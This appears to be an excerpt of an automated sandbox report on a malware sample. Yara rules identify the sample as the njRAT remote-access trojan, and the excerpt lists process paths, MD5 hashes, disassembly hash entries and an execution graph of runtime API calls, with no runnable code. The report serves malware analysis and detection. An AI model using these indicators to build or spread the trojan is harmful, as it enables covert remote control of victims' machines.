                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\ProgramData\essam@sasa2023.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\ProgramData\essam@sasa2023.exe"
                                                                                                                                                                  Imagebase:0x410000
                                                                                                                                                                  File size:176'128 bytes
                                                                                                                                                                  MD5 hash:7266F0DBCD9D7EE7F4618A70D3CB53EE
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: njrat1, Description: Identify njRat, Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                                                                                  • Rule: Njrat, Description: detect njRAT in memory, Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                  • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                  • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                  • Rule: njrat1, Description: Identify njRat, Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                                                                                  • Rule: Njrat, Description: detect njRAT in memory, Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                  • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:15
                                                                                                                                                                  Start time:18:52:43
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf
                                                                                                                                                                  Imagebase:0xb40000
                                                                                                                                                                  File size:1'620'872 bytes
                                                                                                                                                                  MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:16
                                                                                                                                                                  Start time:18:52:47
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\Windows\splwow64.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                                                  Imagebase:0x7ff65bb90000
                                                                                                                                                                  File size:163'840 bytes
                                                                                                                                                                  MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  General

                                                                                                                                                                  Target ID:18
                                                                                                                                                                  Start time:18:52:47
                                                                                                                                                                  Start date:03/11/2023
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo2.rtf
                                                                                                                                                                  Imagebase:0xb40000
                                                                                                                                                                  File size:1'620'872 bytes
                                                                                                                                                                  MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  Disassembly

                                                                                                                                                                  Reset < >

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00007FFD9B88172B Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8050c2a31bb9b347a5665e535de8f9913a69e4de1749fc81dcbba6357275868d
                                                                                                                                                                    • Instruction ID: 208e45354ffe094aead2ba41636976a88b4c593af7b38b3e99274a8978b67c50
                                                                                                                                                                    • Opcode Fuzzy Hash: 8050c2a31bb9b347a5665e535de8f9913a69e4de1749fc81dcbba6357275868d
                                                                                                                                                                    • Instruction Fuzzy Hash: EF812A20B1EE8A0FD76AB77888626A57BD2EF8D310F0541FED05DC71A7CD3859468381
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00007FFD9B8813E5 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d764ee2f9d62b9e1e59e071d9a3e48586beedc76d3246932da97c42fe0729412
                                                                                                                                                                    • Instruction ID: cb1f86ded28501afcf64d13a3804bf4f49badc2a3019f625a95501cc7d097765
                                                                                                                                                                    • Opcode Fuzzy Hash: d764ee2f9d62b9e1e59e071d9a3e48586beedc76d3246932da97c42fe0729412
                                                                                                                                                                    • Instruction Fuzzy Hash: AE51B531B0EE4D4FEBA5EB6C84746B877E2FF5D310B1601BAD45DC71A6DE25A8018341
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00007FFD9B882295 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 63befacd8deb20f32ab110508263f4cf7759d1f787c9d972bc79dd01e0f25f04
                                                                                                                                                                    • Instruction ID: 4614152741ee7d2a0231fd818c45c280b816e8c3b96c08f0f8558a17ee4b5cc6
                                                                                                                                                                    • Opcode Fuzzy Hash: 63befacd8deb20f32ab110508263f4cf7759d1f787c9d972bc79dd01e0f25f04
                                                                                                                                                                    • Instruction Fuzzy Hash: C0515C30B1991D8FDB94EFA8C4A4AADB7F1FF98310F140079E41ED72A6CE38A9418751
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00007FFD9B76EF40 Relevance: .2, Instructions: 169COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754038238.00007FFD9B76D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B76D000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b76d000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 676e2560beae968c5ae35c4ae0cd13da4894114cdc9d83ae632998a978970a76
                                                                                                                                                                    • Instruction ID: 49c9f94b737242f2beeb31bb3588e411e0fd0c5942d2edb4b53acb6751cecc10
                                                                                                                                                                    • Opcode Fuzzy Hash: 676e2560beae968c5ae35c4ae0cd13da4894114cdc9d83ae632998a978970a76
                                                                                                                                                                    • Instruction Fuzzy Hash: 0F512C7150EBC98FE7A69B2C98559523FE0EF56350B1606EFD088CB0B3D624AC45C793
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00007FFD9B88215D Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 473c4579faf145a64b4894f3e1575ebdbbad91c4c99e8113ef7f00b95dff988f
                                                                                                                                                                    • Instruction ID: ee5b54d46c12c91bb2ff871fa421a6a1dc48d33c5187945a40e372a700c2f702
                                                                                                                                                                    • Opcode Fuzzy Hash: 473c4579faf145a64b4894f3e1575ebdbbad91c4c99e8113ef7f00b95dff988f
                                                                                                                                                                    • Instruction Fuzzy Hash: 38412616B0FECA0FE7679BB85835468BF90EF5621470A01FBC499CB0E7DD296E068351
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00007FFD9B880845 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4c7c1e746802efe86f7b5ba851260f75d497b2bfd10682bad2636c720d18df94
                                                                                                                                                                    • Instruction ID: b9be8bbf342c84886911962cae2438b09fc71424022381a963823a89c230e176
                                                                                                                                                                    • Opcode Fuzzy Hash: 4c7c1e746802efe86f7b5ba851260f75d497b2bfd10682bad2636c720d18df94
                                                                                                                                                                    • Instruction Fuzzy Hash: 35314D72F1EB8E8FE7219B78A8751E83FA0FF45715F1500B7D0A8CA1A3DA3855868750
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00007FFD9B880A59 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e2d0367afdc9c3f478b6477b0a78c0dc5e262c31beb7edc088946c6a87ea276e
                                                                                                                                                                    • Instruction ID: e8083656f7168667813b19a2f42238d43762f455904197352242d7946d4286d7
                                                                                                                                                                    • Opcode Fuzzy Hash: e2d0367afdc9c3f478b6477b0a78c0dc5e262c31beb7edc088946c6a87ea276e
                                                                                                                                                                    • Instruction Fuzzy Hash: 04212631B2EE8A4FD7A9D76898756647BE0EF59310B0A01F7C068C71A6DA2C9D418342
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00007FFD9B880948 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: eff0f3aa11e1eecdb0cb2a0153005ec420161d72fb284102f7960f81e8901ace
                                                                                                                                                                    • Instruction ID: 18480b79285837827b2b1a62eaae3ca0da3aaec9d2b1282aa74c8901b3469f4f
                                                                                                                                                                    • Opcode Fuzzy Hash: eff0f3aa11e1eecdb0cb2a0153005ec420161d72fb284102f7960f81e8901ace
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B214172E25D0E8FEB98EB98D8A59FCBBB1FF58640B910175D019E31E6DE3469028740
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00007FFD9B880FF9 Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1f4b0bb7b2bca7cf3eed872516b780ce1d44571c1c851aa9cbd195aadae94534
                                                                                                                                                                    • Instruction ID: 90c017bf45bc6ea7937d695d0c270efe2ea3e8b6c07b6539c3cf5fec38ddedbe
                                                                                                                                                                    • Opcode Fuzzy Hash: 1f4b0bb7b2bca7cf3eed872516b780ce1d44571c1c851aa9cbd195aadae94534
                                                                                                                                                                    • Instruction Fuzzy Hash: A5110452F0FECB5FE75AA3A85876494B791EF5A21470942B7C068CB0A3DD28A8168381
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00007FFD9B880860 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 519e2b3348780fbb880f7ee0e4f2ff00c2fb8faf558cc0bba7b3cbdfb052cc85
                                                                                                                                                                    • Instruction ID: 3a08ca6f80fa05914a525969551cf780c435977949ac0ef41f4604a8f41782a1
                                                                                                                                                                    • Opcode Fuzzy Hash: 519e2b3348780fbb880f7ee0e4f2ff00c2fb8faf558cc0bba7b3cbdfb052cc85
                                                                                                                                                                    • Instruction Fuzzy Hash: 26012671E1AB8D4FE755AB7858740EC3FA0EF09308F5105BBE06CC60A3DE3455858780
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00007FFD9B880AA0 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8bd4c4c84ed074a4cd5d0a9fc02dcbc2c617d8be54c5c8f6b5fc8955f47c9271
                                                                                                                                                                    • Instruction ID: a23fd4070d3698b4968c51be5da5821162cce505496e1809c1fbcc3a59da9404
                                                                                                                                                                    • Opcode Fuzzy Hash: 8bd4c4c84ed074a4cd5d0a9fc02dcbc2c617d8be54c5c8f6b5fc8955f47c9271
                                                                                                                                                                    • Instruction Fuzzy Hash: 00016D31B28D0E4FEBE8EB6C9464A66A3D1FF98710B5445B6D45CC3299EE34EC428740
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00007FFD9B880B01 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: af7b2278c49231616b4b3cb1e719d7b3cd450de85655d1ffabdef329e64da56b
                                                                                                                                                                    • Instruction ID: 6b17dba26f0581f84b0e4e3d716a1be7aed876d01c24afc4f49f1acf3ba02f68
                                                                                                                                                                    • Opcode Fuzzy Hash: af7b2278c49231616b4b3cb1e719d7b3cd450de85655d1ffabdef329e64da56b
                                                                                                                                                                    • Instruction Fuzzy Hash: 2EF0E91060EBD84FD325877848647D17FE29BA6601F0D45DEC09DC6192D5692448C392
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00007FFD9B88297D Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 437c0f31446c45d4e8b76a859155b5705241654d566a5e3fba75007e178d5011
                                                                                                                                                                    • Instruction ID: 2ea4729cca9940a2e632136c73d87e9e2fe2d620f143e2bd6fa9cefc6a5e0c25
                                                                                                                                                                    • Opcode Fuzzy Hash: 437c0f31446c45d4e8b76a859155b5705241654d566a5e3fba75007e178d5011
                                                                                                                                                                    • Instruction Fuzzy Hash: 24D0A738464A4D8FCB40EF55E4018AA77A5FB88314F400656FC6CC7285D739A6B5C7D1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00007FFD9B880FAE Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1754288479.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ffd9b880000_ESjy0irMIn.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 516cab7690d809a1f40488d6020b42c604f92897eb0051d94bcb6a147eb899ea
                                                                                                                                                                    • Instruction ID: b01b17a54aaf86dc2b1c2698dbdbe1548fed55f78f3c5df4501f7d551eb38cdc
                                                                                                                                                                    • Opcode Fuzzy Hash: 516cab7690d809a1f40488d6020b42c604f92897eb0051d94bcb6a147eb899ea
                                                                                                                                                                    • Instruction Fuzzy Hash: 02D0C931798C0E9FCB4CE66DE450DD5B3E1EB583617508AAAC01EC3648EA35E8928BC0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:17.1%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                    Signature Coverage:11.7%
                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                    Total number of Limit Nodes:19
                                                                                                                                                                    execution_graph 15465 29054 15505 2aac0 15465->15505 15467 29060 GetStartupInfoW 15468 29074 HeapSetInformation 15467->15468 15471 2907f 15467->15471 15468->15471 15470 290cd 15472 290d8 15470->15472 15659 29026 15470->15659 15506 2aa99 HeapCreate 15471->15506 15507 2a919 GetModuleHandleW 15472->15507 15475 290de 15476 290e9 __RTC_Initialize 15475->15476 15477 29026 _fast_error_exit 66 API calls 15475->15477 15532 2a299 GetStartupInfoW 15476->15532 15477->15476 15480 29103 GetCommandLineA 15545 2a1fd GetEnvironmentStringsW 15480->15545 15487 29128 15569 29ebd 15487->15569 15488 29aca __amsg_exit 66 API calls 15488->15487 15490 2912e 15491 29139 15490->15491 15492 29aca __amsg_exit 66 API calls 15490->15492 15589 2988b 15491->15589 15492->15491 15494 29141 15495 2914c 15494->15495 15496 29aca __amsg_exit 66 API calls 15494->15496 15595 29e59 15495->15595 15496->15495 15501 2917c 15677 29aa2 15501->15677 15504 29181 _raise 15505->15467 15506->15470 15508 2a936 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 15507->15508 15509 2a92d 15507->15509 15511 2a980 TlsAlloc 15508->15511 15680 2a5da 15509->15680 15514 2a9ce TlsSetValue 15511->15514 15515 2aa8f 15511->15515 15514->15515 15516 2a9df 15514->15516 15515->15475 15690 2982a 15516->15690 15521 2aa27 _DecodePointerInternal 15524 2aa3c 15521->15524 15522 2aa8a 15523 2a5da __mtterm 70 API calls 15522->15523 15523->15515 15524->15522 15699 2dc24 15524->15699 15527 2aa5a _DecodePointerInternal 15528 2aa6b 15527->15528 15528->15522 15529 2aa6f 15528->15529 15705 2a61c 15529->15705 15531 2aa77 GetCurrentThreadId 15531->15515 15533 2dc24 __calloc_crt 66 API calls 15532->15533 15543 2a2b7 15533->15543 15534 2a462 GetStdHandle 15539 2a42c 15534->15539 15535 2dc24 __calloc_crt 66 API calls 15535->15543 15536 2a4c6 SetHandleCount 15542 290f7 15536->15542 15537 2a474 GetFileType 15537->15539 15538 2a3ac 15538->15539 15540 2a3e3 InitializeCriticalSectionAndSpinCount 15538->15540 15541 2a3d8 GetFileType 15538->15541 15539->15534 15539->15536 15539->15537 15544 2a49a InitializeCriticalSectionAndSpinCount 15539->15544 15540->15538 15540->15542 15541->15538 15541->15540 15542->15480 15667 29aca 15542->15667 15543->15535 15543->15538 15543->15539 15543->15542 15543->15543 15544->15539 15544->15542 15546 2a219 WideCharToMultiByte 15545->15546 15550 29113 15545->15550 15548 2a286 FreeEnvironmentStringsW 15546->15548 15549 2a24e 15546->15549 15548->15550 15551 2dbda __malloc_crt 66 API calls 15549->15551 15558 2a13d 15550->15558 15552 2a254 15551->15552 15552->15548 15553 2a25c WideCharToMultiByte 15552->15553 15554 2a27a FreeEnvironmentStringsW 15553->15554 15555 2a26e 15553->15555 15554->15550 15556 2c318 _free 66 API calls 15555->15556 15557 2a276 15556->15557 15557->15554 15559 2a152 15558->15559 15560 2a157 GetModuleFileNameA 15558->15560 15953 2ca40 15559->15953 15562 2a17e 15560->15562 15947 29f9e 15562->15947 15564 2911d 15564->15487 15564->15488 15566 2dbda __malloc_crt 66 API calls 15567 2a1c0 15566->15567 15567->15564 15568 29f9e _parse_cmdline 76 API calls 15567->15568 15568->15564 15570 29ec6 15569->15570 15573 29ecb _strlen 15569->15573 15571 2ca40 ___initmbctable 94 API calls 15570->15571 15571->15573 15572 2dc24 __calloc_crt 66 API calls 15578 29f00 _strlen 15572->15578 15573->15572 15576 29ed9 15573->15576 15574 29f4f 15575 2c318 _free 66 API calls 15574->15575 15575->15576 15576->15490 15577 2dc24 __calloc_crt 66 API calls 15577->15578 15578->15574 15578->15576 15578->15577 15579 29f75 15578->15579 15582 29f8c 15578->15582 16394 2db76 15578->16394 15580 2c318 _free 66 API calls 15579->15580 15580->15576 15583 2afa1 __invoke_watson 10 API calls 15582->15583 15585 29f98 15583->15585 15584 2db59 __wincmdln 76 API calls 15584->15585 15585->15584 15587 2a02a 15585->15587 15586 2a128 15586->15490 15587->15586 15588 2db59 76 API calls __wincmdln 15587->15588 15588->15587 15590 29899 __IsNonwritableInCurrentImage 15589->15590 16403 2d5c5 15590->16403 15592 298b7 __initterm_e 15594 298d8 __IsNonwritableInCurrentImage 15592->15594 16406 2d5a9 15592->16406 15594->15494 15596 29e67 15595->15596 15597 29e6c 15595->15597 15598 2ca40 ___initmbctable 94 API calls 15596->15598 15599 29152 15597->15599 15600 2db59 __wincmdln 76 API calls 15597->15600 15598->15597 15601 159a6 GetModuleHandleW 15599->15601 15600->15597 16471 16c5c GetCommandLineW CommandLineToArgvW 15601->16471 15603 15abf 15606 15ae3 15603->15606 15656 159fe 15603->15656 16496 18417 15603->16496 16505 160af 15606->16505 15607 15bc5 16646 168fb 15607->16646 15611 159f8 _memset _wcsrchr 15611->15603 15613 2921c __NMSG_WRITE 66 API calls 15611->15613 15611->15656 15617 15a50 PathRemoveExtensionW 15613->15617 15614 15bd4 16661 1a414 15614->16661 15615 15bd9 15624 15be3 15615->15624 16671 16463 15615->16671 16625 2de40 15617->16625 15622 15c07 16715 184c7 GetLocalTime 15622->16715 15624->15622 16682 15cda 15624->16682 15634 15b60 #17 GetTickCount 16535 1621f GetProcessHeap HeapAlloc 15634->16535 15637 184c7 118 API calls 15639 15c39 15637->15639 15640 15c4d 15639->15640 16729 18e6f GetProcessHeap HeapFree 15639->16729 15643 15c6b 15640->15643 15644 15c5d CloseHandle 15640->15644 15641 15b90 GetTickCount 16571 15945 15641->16571 15646 15c7a 15643->15646 15648 18e6f 3 API calls 15643->15648 15644->15643 15649 15c8f 15646->15649 15651 18e6f 3 API calls 15646->15651 15647 15b99 15647->15607 16583 15e0b 15647->16583 15648->15646 15650 15c9e 15649->15650 15652 18e6f 3 API calls 15649->15652 15653 15cad 15650->15653 15655 18e6f 3 API calls 15650->15655 15651->15649 15652->15650 15657 291d5 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 15653->15657 15655->15653 15656->15607 16638 1854a 15656->16638 15658 15ccf 15657->15658 15658->15501 15674 29a6c 15658->15674 15660 29034 15659->15660 15661 29039 15659->15661 15662 29ccc __FF_MSGBANNER 66 API calls 15660->15662 15663 29b18 __NMSG_WRITE 66 API calls 15661->15663 15662->15661 15664 29041 15663->15664 15665 297f1 __mtinitlocknum 3 API calls 15664->15665 15666 2904b 15665->15666 15666->15472 15668 29ccc __FF_MSGBANNER 66 API calls 15667->15668 15669 29ad4 15668->15669 15670 29b18 __NMSG_WRITE 66 API calls 15669->15670 15671 29adc 15670->15671 18736 29a87 15671->18736 15675 29927 _doexit 66 API calls 15674->15675 15676 29a7d 15675->15676 15676->15501 15678 29927 _doexit 66 API calls 